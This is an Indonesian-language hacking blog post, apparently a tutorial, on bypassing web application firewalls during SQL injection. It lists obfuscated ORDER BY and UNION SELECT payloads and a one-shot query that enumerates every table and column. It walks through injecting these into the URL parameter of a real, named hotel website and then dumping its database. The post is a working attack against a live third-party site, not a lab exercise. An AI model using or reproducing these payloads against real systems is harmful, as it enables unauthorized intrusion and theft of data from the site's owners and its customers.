Halo hamker hamker sekalian
Kali ini gw (Rev) bakal share tentang macam macam bypass di sql injection. Sesuai lanjutan materi tentang SQL Injection kita lanjut ke bagian ini.
Setelah kita udah paham tentang basic sql injection, kita terkadang jumpa dengan web yang ngeselin, kayak ketika waktu mengorder by , kadang 403 forbidden, not acceptable dan lain nya. Nah kali ini gw mau bagiin cara membypass WAF di sql injection itu.
WAF atau Web Application Firewall berguna sebagai firewall security web untuk keamanan umum. Jadi, bisa dibilang web yang rata rata udah dipasangin waf itu udah kebal yang namanya dengan sql injection basic atau dengan statement error karakter (') atau (/**).
Oke
deh ini dia sedikit macam macam bypass dalam sql injection, kenapa
sedikit ?Karena yang banyak kalian bisa lihat di https://pastebin.com/raw/YjxeFagh
{ ORDER BY }
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!50000union*/+/*!50000select*/
Masih banyak sebenernya cuma nanti aja buat post selanjutnya, kalo ini emang bener bener udah bisa baru w post selanjutnya.
Segitu dulu nanti minggu depan w kasi semuanya sama dios diosnya
Sekarang kita bakal coba pada suatu web yang terdapat WAF nya, web nya ialah :
https://intourhotels.com.sa/en/dining.php?id=1
Cara
awal inject sama aja kyk yang basic ORDER BY, jadi w gk perlu jelasin
lagi tentangORDER BY nya, karena WAF nya gk ada disitu, adanya di UNION
jadi langsung ke UNION aja.
https://intourhotels.com.sa/en/dining.php?id=1+order+by+10--+ > Error
https://intourhotels.com.sa/en/dining.php?id=1+order+by+9--+ > Normal
Tau kan harus ambil yg mana
langsung ke Union
Nah
pas +union+all+select+1,2,3,4,5,6,7,8,9--+ tampilannya begitu, ini lah
salah satu tampilan WAF, kita coba bypass dengan query yg diatas kita
ambil salah satu yang /*!50000union*/+/*!50000select*/
jangan lupa taro - sebelum parameter jadi
https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9--+
maka tampilannya kembali normal
yess disini kita sudah berhasil membypassnya, lanjut ...
Muncul
nomor togel 3 yaudah taro dios disitu, karena ini WAF jadi Diosnya juga
WAF, pake DIOS yang kemarin di Basic SQL Injection pasti gk bakal bisa,
Ni w kasi DIOS w :
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
maka BOOM
Ni w kasi Full Query nya takut gk pada paham, pahamin sendiri, atau nanya silahkan...
Nanya aja di Grup ok
https://intourhotels.com.sa/en/dining.php?id=-1+/*!50000union*/+/*!50000select*/+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),4,5,6,7,8,9--+
mau Dump Database ?
Sama aja kyk biasanya Concat(table_name) . . . +from+colomn_name--+
Berhubung ini WAF maka Concatnya di Bypass juga jadi /*!50000Concat*/(table_name) . . . +from+colomn_name--+
masi gk bisa ? lu berarti ada yg salah w juga bisa
kalo masi lupa liat basic SQL Injection yang pertama w Post
Segitu aja dari w kalo da kesalahan mohon maaf dan tolong dikoreksi, Silahkan diskusi di kolom komentar/di grup.
Thanks